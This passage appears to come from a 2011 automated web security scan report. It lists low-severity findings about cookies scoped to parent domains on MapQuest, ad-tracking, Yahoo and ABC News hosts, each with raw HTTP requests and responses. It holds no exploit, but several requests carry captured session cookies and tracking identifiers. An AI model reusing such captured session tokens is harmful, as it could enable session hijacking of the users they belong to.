Set-Cookie: _twitter_sess=BAh7CjoMY3NyZl9pZCIlYzExNDEwZTU2MGMzZTAwODc5MDQxNWUxZDVkYzEy%250ANWM6DnJldHVybl90byI9aHR0cDovL3R3aXR0ZXIuY29tL0hlZWN0b29yMTAv%250Ac3RhdHVzZXMvNjYxMTk0NDcxNzc0NzQwNDk6D2NyZWF0ZWRfYXRsKwgAiTXA%250ALwE6B2lkIiU1ZWUyZGZhNmFlNmY3ZDA2OGY5OGZkMzM2M2FkZmI2YyIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7AA%253D%253D--e25c9608c35c992185266e68f57f4b2dcddac49b; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 36486

{"statuses":[{"text":"@saritaa_raqueel Ahhhh :D","coordinates":null,"truncated":false,"id_str":"66119477279997952","source":"web","geo":null,"favorited":false,"retweet_count":0,"entities":{"urls":[],"
...[SNIP]...

16.5. http://t.mookie1.com/t/v1/imp

Summary

Severity:   Low
Confidence:   Firm
Host:   http://t.mookie1.com
Path:   /t/v1/imp

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /t/v1/imp?migAgencyId=234&migSource=atlas&migAtlAI=205850472&migRandom=362011266&migTagDesc=Cingular&migAtlSA=319709115&migAtlC=480d7815-42e6-4315-a737-64cdf14f8adc HTTP/1.1
Host: t.mookie1.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW802rT5oABV/F; RMFL=011QD4ETU107OI|U107OK; id=914804995789526; RMFM=011QGuZMJ10CWN|U10CXL; NXCLICK2=011QGuZMNX_TRACK_Radioshack/Exelate/DYN2011Q1/X_TE_ALL/1x1/11304348270.6228!y!B3!CXL!EVT

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:15 GMT
Server: Apache/2.0.52 (Red Hat)
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="NOI DSP COR NID CUR OUR NOR"
Set-Cookie: id=914804995789526; path=/; expires=Tue, 29-May-12 01:00:15 GMT; domain=.mookie1.com
Set-Cookie: session=1304557215|1304557215; path=/; domain=.mookie1.com
Content-Length: 35
Content-Type: image/gif

GIF87a.............,...........D..;

16.6. http://www.dooce.com/|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.dooce.com
Path:   /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /|http:/www.mightygoods.com/|http:/www.coolmompicks.com|onemanga.com|psychcentral.com|webmail.aol.com|http:/www.weblogsinc.com|http:/www.webmd.com/$|wonderwall.msn.com|msn.com/wonderwall|v14.msn.com/|preview.msn.com/|www.msn.com/preview.aspx|mtv.com/videos/|mtv.com/ HTTP/1.1
Host: www.dooce.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:56:29 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.11
X-Powered-By: PHP/5.2.11
Set-Cookie: SESS30952fbaf4ac11922b9cafbdf8d115e4=3978a428e0c8068b8d55294bde46612c; expires=Sat, 28-May-2011 14:29:49 GMT; path=/; domain=.dooce.com
Last-Modified: Thu, 05 May 2011 10:55:52 GMT
ETag: "7f0e32fa0924b70c7c5abdc1af28feda"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 10192

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"xmlns=xmlns:og="http://opengraphprot
...[SNIP]...

16.7. http://www.mapquest.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?ncid=txtlnkmqmq00000001 HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: t_Id=ZGVmYXVsdDpudWxs; Path=/
Set-Cookie: tsession="PpBmGmuR4mRIyqziAQ2PxT1oEdE="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:03 GMT; Path=/
Set-Cookie: psession="B2III+t4bMnXkU9N54bv280ThuY="; Version=1; Domain=mapquest.com; Max-Age=7776000; Expires=Wed, 03-Aug-2011 00:57:03 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:03 GMT; Path=/
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Date: Thu, 05 May 2011 00:57:02 GMT
Content-Length: 32047

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" xml:lang="en" c
...[SNIP]...

16.8. http://www.mapquest.com/_svc/ad/getads

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/ad/getads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/ad/getads HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 732

{"request":{"pageView":"initial","userLocale":"en_US","userState":{"locations":[{"role":"mapcenter","lattitude":32.78699999999999,"longitude":-96.79900000000002}],"legs":[],"searches":[],"routeDistanc
...[SNIP]...

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 464

{"data":{"parameters":{"dotcom-right-header":{"adParametersTypeString":"HTML","encodedStateHash":null,"htmlText":"","type":"HTML"},"bottom-content":{"adParametersTypeString":"UAC","adTitle":null,"adTy
...[SNIP]...

16.9. http://www.mapquest.com/_svc/apixel

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/apixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/apixel?t=jsop&i=_0&v=4&1=mq.main&2=mq%20main&3=no%20referrer&4=map%20%3A%20afarm%20%3A%20baseline&5=none&6=null&7=undefined&8=null HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Pragma: no-cache
Cache-Control: no-cache,no-store,must-revalidate
Expires: Mon, 1 Feb 2001 08:32:00 GMT
Content-Type: image/gif
Content-Length: 35
Date: Thu, 05 May 2011 00:57:10 GMT

GIF87a.............,...........D..;

16.10. http://www.mapquest.com/_svc/publishing/promo

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/publishing/promo

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /_svc/publishing/promo HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
Origin: http://www.mapquest.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/json; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="
Content-Length: 62

{"key":"winston-site-selector","language":"en","country":"us"}

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Expires: Mon, 20 Dec 1998 01:00:00 GMT
Last-Modified: Thu, 05 May 2011 00:57:09 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Type: application/json
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 1199

{"data":{"text":"<ul>\r\n <li><a onclick=\"m3.util.Event.publish('EventLog', {action: 'MQSITES-ROUTEPLANNER-CLICK'});\" href=\"http://www.mapquest.com/routeplanner\">Route Planner</a></li>\r\n <
...[SNIP]...

16.11. http://www.mapquest.com/_svc/searchio

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /_svc/searchio

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /_svc/searchio?action=config&locale=en_US&shapepoints=(32.93119675804705,-96.97066137694627,32.64256910519762,-96.62733862305373) HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:09 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:09 GMT; Path=/
Cache-Control: no-transform
Content-Type: application/json;charset=UTF-8
Date: Thu, 05 May 2011 00:57:08 GMT
Content-Length: 101621

{"advertisers":[{"addressSummaryPrefixUrl":null,"addressSummaryTracking":[],"bannerAds":[{"height":0,"magicNumber":"93306669","type":"234x60","width":0}],"branded":true,"brandedSearchOnly":false,"clus
...[SNIP]...

16.12. http://www.mapquest.com/cdn/_uac/adpage.htm

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/_uac/adpage.htm

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/_uac/adpage.htm HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:11 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:11 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"1171-1304454928000"
Last-Modified: Tue, 03 May 2011 20:35:28 GMT
Content-Type: text/html
Cteonnt-Length: 1171
Date: Thu, 05 May 2011 00:57:10 GMT
Content-Length: 1171

<html>
<head>
<script type='text/javascript'>
var blockedReferrer = "";
var dom=location.hash
if (dom!=''){
dom=dom.substr(1)
document.domain=dom
}

function adsPageOnL(){
var adFr=window.frameE
...[SNIP]...

16.13. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /cdn/dotcom3/images/new_purple_button.jpg

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /cdn/dotcom3/images/new_purple_button.jpg HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Accept-Ranges: bytes
ETag: W/"660-1304454926000"
Last-Modified: Tue, 03 May 2011 20:35:26 GMT
Content-Type: image/jpeg
Content-Length: 660
Date: Thu, 05 May 2011 00:57:09 GMT

...[SNIP]...

16.14. http://www.mapquest.com/icons/stop.png

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.mapquest.com
Path:   /icons/stop.png

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /icons/stop.png?text=A HTTP/1.1
Host: www.mapquest.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: t_Id=ZGVmYXVsdDpudWxs; tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; psession="FAoATxmA8Lim4iO1MAgenPPZWkY="; s_pers=%20s_getnr%3D1304575026551-New%7C1367647026551%3B%20s_nrgvo%3DNew%7C1367647026552%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: tsession="eMH+kPoDltOjRD+eAI3bjq5N7zk="; Version=1; Domain=mapquest.com; Max-Age=1800; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Set-Cookie: tsexpiry=1; Domain=mapquest.com; Expires=Thu, 05-May-2011 01:12:10 GMT; Path=/
Set-Cookie: c_Id=MjM5OjM5OQ%3D%3D; Expires=Thu, 05-May-2011 01:27:10 GMT; Path=/
Last-Modified: Tue, 03 May 2011 20:35:24 GMT
Expires: Thu, 05 May 2011 01:21:10 GMT
Content-Type: image/png
Date: Thu, 05 May 2011 00:57:09 GMT
Content-Length: 923

...[SNIP]...

16.15. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://480-adver-view.c3metrics.com
Path:   /c3VTabstrct-6-2.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /c3VTabstrct-6-2.php?id=adver&cid=480&t=72&rv=&uid=&td= HTTP/1.1
Host: 480-adver-view.c3metrics.com
Proxy-Connection: keep-alive
Referer: http://www.huffingtonpost.com/ads/ads_iframe.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C3UID=13014572191303613803; __utmz=50049588.1304384012.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 603-PV=1#5/3/2011/0/53/33; _jsuid=6502829057886404149; __ar_v4=QQIKSQRSOVDJFIQJ7MO55Y%3A20110502%3A2%7CGGAJKTM5HZA37LK7ZM43YU%3A20110502%3A2%7CM5MLKX2RJBHNJMOYLCAI74%3A20110502%3A2; __utma=50049588.16355070.1304384012.1304384012.1304384012.1; 603-CT=1#5/3/2011/1/4/52; 480-SM=adver_05-02-2011-12-46-04; 480-VT=adver_05-02-2011-18-40-19_14154412931304361619ZZZZadcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019; SERVERID=s12

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:46 GMT
Server: Apache
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Cache-Control: no-cache
Expires: -1
Set-Cookie: 480-SM=adver_05-02-2011-12-46-04; expires=Sun, 08-May-2011 00:59:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-VT=adcon_05-02-2011-19-56-33_16472352731304366193ZZZZaol_05-05-2011-00-56-59_1369924471304557019ZZZZadver_05-05-2011-00-59-46_1535373811304557186; expires=Tue, 03-May-2016 00:59:46 GMT; path=/; domain=c3metrics.com
Set-Cookie: 480-nUID=adver_1535373811304557186; expires=Thu, 05-May-2011 01:14:46 GMT; path=/; domain=c3metrics.com
Content-Length: 6658
Connection: close
Content-Type: text/html

if(!window.c3VTconsts){c3VTJSconsts={c3VJSconst:{c3VJSscriptLimit:0,c3VJSobjLimit:new Array(),c3VJSeleLimit:0,c3VJSurl:'c3VTabstrct-6-2.php',c3VJSvtlog:'vtcall.php'}};window.c3VTconsts=c3VTJSconsts}if
...[SNIP]...

16.16. http://abcnews.go.com/Entertainment/popup

Summary

Severity:   Information
Confidence:   Certain
Host:   http://abcnews.go.com
Path:   /Entertainment/popup

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Entertainment/popup HTTP/1.1
Host: abcnews.go.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:52:20 GMT
Content-Type: text/html
Server: Microsoft-IIS/6.0
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE"
From: abc06
X-Powered-By: ASP.NET
Set-Cookie: SWID=363BC427-C28A-43A8-8CBD-F5FAEA1DCED9; path=/; expires=Thu, 05-May-2031 10:52:20 GMT; domain=.go.com;
Content-Length: 7679
Connection: close
X-UA-Compatible: IE=EmulateIE7
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head>
<title>ABC
...[SNIP]...

16.17. http://add.my.yahoo.com/content

Summary

Severity:   Information
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /content

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content HTTP/1.1
Host: add.my.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 10:52:13 GMT
Set-Cookie: B=0l8dhl16s50at&b=3&s=ab; expires=Tue, 05-May-2013 20:00:00 GMT; path=/; domain=.yahoo.com
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=iso-8859-1
Cache-Control: private
Content-Length: 3312

<!doctype html public "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head><title>Yahoo! - 404 Not Found</title><style>
/* nn4 hide */
/*/*/
body {font:small/1.2em arial,h
...[SNIP]...

16.18. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /PortalServe/?pid=1278496Y12520110421185410&time=4|0:56|-5&redir=http://at.atwola.com/adlink/5113/1955435/0/170/AdId=1646412;BnId=1;itime=557013265;kvugc=0;kvpg=music%2Eaol%2Fradioguide%2Fbb;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93312491;kvtid=16r4opq1tvlkml;kvseg=99999:53380:60490:52615:60491:50507:53656:55401:57094:51182:56419:56780:54057:56969:56835:56987:50220:54063:50221:56299:56673:56148:50280:60183:60130:53615;nodecode=yes;link=$CTURL$&r=0.9791483252774924 HTTP/1.1
Host: ads.pointroll.com
Proxy-Connection: keep-alive
Referer: http://music.aol.com/_uac/adpage.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
